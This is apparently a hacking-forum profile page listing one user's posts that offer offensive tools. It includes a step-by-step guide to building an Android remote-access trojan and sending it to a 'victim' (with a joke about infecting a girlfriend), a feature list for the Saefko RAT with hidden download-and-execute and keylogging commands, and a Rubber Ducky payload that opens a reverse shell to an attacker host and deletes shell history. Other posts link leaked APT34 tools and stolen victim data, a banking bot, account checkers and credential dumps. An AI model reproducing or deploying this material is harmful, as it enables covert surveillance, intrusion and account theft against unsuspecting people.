dEEpEst

Administrators
  • Content Count

    4,789
  • Avg. Content Per Day

    12
  • Joined

  • Last visited

  • Days Won

    489

Everything posted by dEEpEst

  1. TheDoctor says: This is an Android application, which runs a background service on boot to receive commands. Sounds simple, is simple. Features Background service, which is able to receive commands Service is running on boot C&C via E-Mail (And here we got the first point, which should get discussed… See below ) Communication is encrypted with XOR (Yeeha, directly got the second discussion point ) A solid error-handling, that our Client doesn’t crash due to connection errors or invalid input Remote Administration via Windows application (Should run under Linux with Mono too… Maybe someone here want to test it?) Commands At the moment I only included two POC commands to show how commands in generell can be added. Of course these ones are pretty boring, but you can easily extend the RAT with your one ones! And I’ll add more useful commands in the next days/weeks. Show a Toast Open a webpage Why do you use E-Mail for C&C? Mmh… I didn’t want to use Reverse TCP and have recently read about E-Mail C&C, which I wanted to try out. At the moment I’ve got no problems with this decision, but you should add FTP support, when you want to send files or big data back to your Server. XOR-encryption? Are you fuckin’ serious, man? Of course that’s not meant for real protection . I just wanted to have something to hide my communication from “normal” people. I’ll add AES + Some sort of origin-validation, which takes us to the next point: WARNING At the moment anyone can hijack the connection and send commands to our Client, who knows the Server’s Mail address (Password’s not needed; keyword is spoofing), the Client’s Mail address andthe XOR key! I don’t think you want anyone to send weird messages to your Girlfriend, after you infected her with the RAT, so I’ll fix this soon . Setup Here comes the newbie friendly guide on how to build an APK out of the source code, setup the required Mail addresses and use the Control Server for sending commands! I use Win10 64-Bit with Visual Studio 2015. Other OSs and IDEs couldwork, but are not supported! Ok, now after I’ve created a bad mood for the Linux and Mac users here, we can go further on . (Little side note: I would have used Linux, but sadly Xamarin is only available for Windows and MacOS… And programming in Java is out of discussion) Client First you have to install Visual Studio with Xamarin. Don’t know how? See here 82. Now download the project from my Github page 248. Run Visual Studio and open the project: Select now the Project file: Now you only have to open the Globals file from the project Argus - RAT. Not Argus - RAT ~ Server! You should see the Globals.cs file now in the middle of your screen. Here’s the only place you have to edit. If you don’t know what you’re doing, don’t touch other files! It’s not needed. Ok, as you see you’ll need two Mail addresses, which you have to create on your own. As an example I use [Hidden Content] 59, because they don’t check anything, so you can easily create the addresses anonymously, but I don’t know wether you understand the page, without a knowledge of german . Of course you can use Gmail too, but they always ask me for validation via phone call… Anyway, the important part is that you may have to allow POP & IMAP access to your account in the Mail settings of your provider! [Hidden Content] 59needs it and I think others need it too! Just google around, if you don’t know . If you use another provider and not [Hidden Content] 59, you’ll have to change the Mail Server settings in Globals.cs too! And another time, just google around for POP & SMTP address + ports and I’m sure you’ll find it . Ok, after you’re done fill in your details in Globals.cs: //-\\-//-\\-//-\\-//-\\-//- MAIL STUFF -\\-//-\\-//-\\-//-\\-//-\\ // MAIL SERVER Only needs to be changed, when you use another provider public String MailServerPopAddress = "pop3.web.de"; public String MailServerSmtpAddress = "smtp.web.de"; public int MailServerSmtpPort = 587; public int MailServerPort = 995; // CLIENT public String ClientMailAddress = "Client@web.de"; // The address of the client public String ClientMailPass = "p455w0rd"; // The password of your Client's mail address // SERVER public String ServerMailAddress = "Server@web.de"; // The address of your Server // ENCRYPTION public String XorKey = "testKeyOfDoom"; // The key you use for encrypion. Please use something hard, because you won't have to fill it in any forms multiple times. You'll just have to fill it in, when you add the Client to your Server (See later) and then you can just forget it! After you changed the relevant values check them twice! You won’t get a second chance. When the .APK is sent to your victim and it doesn’t work, it’ll get interesting to tell him/her that he/she has to install your “new” version of the program, just because you filled in the wrong credentials… Sure that you’re ready? Then we come to the building process… First, change the mode to “Release”: Then select Tools -> Android -> Publish Android App. Now you should get a screen like this one, if you do it the first time: Just fill in whatever you like to create new keys for signing and continue. On the next screen choose the path to save it to and the name. Ready? Click Publish! Now it takes some time… When it’s finished, you got a fully working Android Remote Administration Tool! Just send the .APK to your victim and when he/she installs and opens it you’re in! Server The setup of our Server is much easier. Either open the Argus - RAT ~ Server project in Visual Studio and run it by pressing F5 or search the Argus - RAT ~ Server directory manually and run the executable in the Release directory. That’s up to you . Anyway, you’ll get this: Yes, not that great stuff… As I said above, I’ve only added two POC commands, but I’ll explain later how you can add your very own functions! For now just click Add Client. Explanation Name: The name you want to call your Client. It’s just a description and does not depend on anything, so you can choose whatever you want . Client’s Mail address: The address you chose for your Client. Server’s Mail address: The address you’ll use for the Server. Server’s Mail password: Don’t know what should be here? Please just go to [Hidden Content] 20 or any other kids place… Encryption Key: The key you used in the Globals.cs file! Upper and lower case is respected! And that was it. Now you can select the Client via ComboBox and send him commands: Developer? You are a developer and want to extend the RAT’s features? Then you’re exactly the kind of person I appreciate here . Ok, to make it easier for you I’ll explain every step you have to make, when you want to add your function! I hope you’ve already opened the project in Visual Studio. If not, do so. The important files are: Argus - RAT MainService.cs Commands.cs Argus - RAT ~ Server Commands.cs And you should add your own entry in the Form. That’s up to you, how you want to do it, so I don’t explain this step. Every file is open? Great, let’s go on. Think about it… What do you want as a new function? What arguments are needed? Which name do you want to give the command? These questions have to be answered before you continue. As an example I’ll use the Toast command I already added. Name: Toast Argument(s): Text Server (Commands.cs) In the Commands.cs file you only have to add a function like this one: /// <summary> /// Sends a Toast to Client /// </summary> /// <param name="text">The Toast to show</param> public bool SendToast(String text) { String body = "Toast:" + text; return SendMail(body); } Please put it below the /* Commands*/ comment, so that everything’s in the right order . Explanation The only thing I have to explain is the String body = "Toast:" + text;. The "Toast:" is used to identify the command when it arrives at your client. Just change Toast with the name you’ve chosen fo your function and the arguments behind with the ones you need. If you got any questions feel free to ask me . Client In the MainService.cs you just have to add an else if to the handleCommand() function. Example: else if (cmd == "toast") Commands.ShowWebsite(value); Make sure to use lowercase even when you used uppercase at Server-side. The command will be made lowercase, when it arrives at the client! value is everything behind the colon. And now the setup is finished and you can start writing your own function! Open Commands.cs and add your Code. For example: /// <summary> /// Shows the given text as toast /// </summary> /// <param name="text">Text to toast out</param> public static void ShowToast(String text) { Application.SynchronizationContext.Post(_ => { Toast.MakeText(Android.App.Application.Context, text, ToastLength.Long).Show(); }, null); } Now you’ve made your own function within about 5 minutes! Conclusion Wow, it got longer than I thought . I hope you’re enjoying this and are interested in extending the features . I’ll add different improvements in the next days, so make sure to check it out . For everyone who wants to test out his own features or just want to try the RAT without using any samrtphone, I can recommend Bluestacks 11! It is annoying as CAPTCHAs, but very helpfull, if you just want to easily test your apps in a nearly real environment. |-TheDoctor-| [HIDE] [Hidden Content]]
  2. Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  3. dEEpEst

    BTC.CoM Checker

    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  4. dEEpEst

    Instagram by FuseFire

    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  5. dEEpEst

    Netflix GC Generator

    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  6. Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  7. dEEpEst

    FREE NORD VPN 

    [Hidden Content]
  8. Besides source code for the above tools which i posted recently Iranian hackers also leaked data taken from victims that had been collected in some of APT34's backend command-and-control (C&C) servers. Data was taken from both government agencies, but also from private companies including APT34 operations, ip address and other operational data. Tools: Dumps hacked: [HIDE][Hidden Content]] Password: level23haktools.com
  9. APT34 (Iranian cyber-espionage) [2019] In an incident reminiscent of the Shadow Brokers leak that exposed the NSA's hacking tools, someone has now published similar hacking tools belonging to one of Iran's elite cyber-espionage units. Download: [HIDE][Hidden Content]] Password: level23hacktools.com Dumps Hacked Data: This is in the PRIV8 area, otherwise you can access purchase the free pass for life here
  10. Swapnil Pathak is an cybersecurity enthusiast and a student with broad interests in computer systems, IoT and software security. [Hidden Content]
  11. Saefko Attack Systems the most advance RAT-BOT-AGENT ever created This is "a multi protocol multi operating system" remote administration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first Unlimited number of machines to control. Extreme reliability. Android and Windows control at the same time. No port forwarding. No mysql. This project was designed to replace all RAT/BOTS that are made to control remote machine,the problem with all current RATS/BOTS that they are unreliable and limited , you cant in 99.9% of the time have more than 100 machine or victim due to self flooding , self flooding meaning when the client connect to the server directly "when the rat connect to the attacker pc through TCP" . When the number of connected clients increased this acte as flood attack, so you will be limited to some low number and you will end up with lagy unreliable connection to the target machines. That's from the side of TCP rats the other side is the http bots ,that use a remote server containing some php scripts and mysql server , this design can handle unlimited number of machines in theory , but the problem with this design is that you do not have a direct connection to the machine so you are limited to http tasks and this dose not give you much control so that was just a quick short overview on some of extreme problems that RATS/BOTS facing with current techs,in Saefko Attack Systems "SAS" you combining both of these types of connections and adding IRC Protocol to the mix you will end up with extremely reliable connection to the target machine,SAS will handle millions of connections with direct TCP communications established through IRC networks any time any place all wither. Fast Setup Youtube : Main Windows Public HTTP Tasks Windows Build Android Build Command And Control Sections Android Command And Control Sections Android IRC Commands ANDROID COMMANDS [msg] Show toast message. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [ping] Ping the agent machine to check if still active. [location] Get geo location information based on 'ipinfo.com'. [flashon] Turn the dvice flash on. [flashoff] Turn the dvice flash on. [wakeup] Turn dvice screen on. [screenshot] Take a screenshot to from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Android TCP Commands Android Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Now Windows Command And Control Windows IRC Commands WINDOWS COMMANDS [pwd] Show current directory. [screenshot] Take a screenshot to from the target machine. [opencd] Open cd rom. [closecd] Close cd rom. [ping] Ping the agent machine to check if still active. [camlist] Get a list of available camera devices. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [location] Get geo location information based on 'ipinfo.com'. [opencd] Open cd rom. [keylogs] Get agent saved keylogs through HTTP drop point. [shell] Run shell commands. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [uninstall] Uninstall the agent completely from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Windows TCP Commands Windows Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Download: [Hidden Content]
  12. dEEpEst

    X6 4Shared Accounts

    [Hidden Content]
  13. [Hidden Content]
  14. Learn Photoshop and photography by designing levitation digital art! In this course, you will learn industry-standard editing techniques in Photoshop and learn the fundamentals and beyond for effective photography, all while having fun producing digital art. You'll learn from our four photoshoots for levitation digital art: a vintage studio, a sand dunes scene with smoke, a university architecture scene, and a rundown building with sparklers. Each of the four sections has two projects to follow along with, after learning from the photoshoots. This course comes with 16 JPEG images to produce the levitation effect using a variety of techniques, 36 PSD Photoshop files to learn from, and helpful handouts, including a PDF on common Photoshop shortcuts, a PDF on Photoshop file types, and a 21-page PDF on photography fundamentals. After learning from the four photoshoots and multiple follow-along Photoshop projects in each section, you put what you learned into practice by producing a final project of levitation digital art with your own photos. Check out the sample videos for more information on the course and our bios for information on our qualifications! See you in the course! Song in promotional video is called Heartwarming by Kevin MacLeod (CC). Who is this course for? Anyone new to photography and Photoshop or those who are not new but want to learn more about digital art techniques and principles. Anyone who wants to create amazing levitation digital art composites using photography and Photoshop! [HIDE] [Hidden Content] /HIDE]
  15. Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  16. Script To Start Your Own Movie Site OVOO 2.5.7 - Movie & Video Streaming CMS with Unlimited TV-Series Download: [Hidden Content] Demo Link : [Hidden Content]
  17. dEEpEst

    OSX Backdoor

    OSX-screened-backdoor Rubber Ducky payload for semi persistent backdooring using screen. REM Title: OSX Backdoor REM Author: Fer Gonzalez (armi3) REM Making enough time for keyboard recognition window to open before starting. DELAY 1500 GUI SPACE DELAY 900 STRING Terminal DELAY 500 ENTER DELAY 1000 DELAY 700 ENTER DELAY 300 REM Setting a screen for persistence. STRING screen -t "sneaky-boy" DELAY 500 ENTER DELAY 500 ENTER DELAY 500 REM Sending reverse interactive shell to attacker's 1337 netcat listener. STRING bash -i >& /dev/tcp/attackerip/1337 0>&1 DELAY 500 ENTER DELAY 500 REM Detaching screen session and cleaning up the crime scene. CONTROL a DELAY 300 STRING d DELAY 500 STRING rm ~/.bash_history DELAY 500 ENTER DELAY 300 GUI q
  18. dEEpEst

    Anubis 2.5 Android Bot Banking

    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  19. dEEpEst

    X4 SCRIBD

    [Hidden Content]
  20. dEEpEst

    X4 SONYLIVE

    [Hidden Content]
  21. dEEpEst

    X4 GRAMMARLY

    [Hidden Content]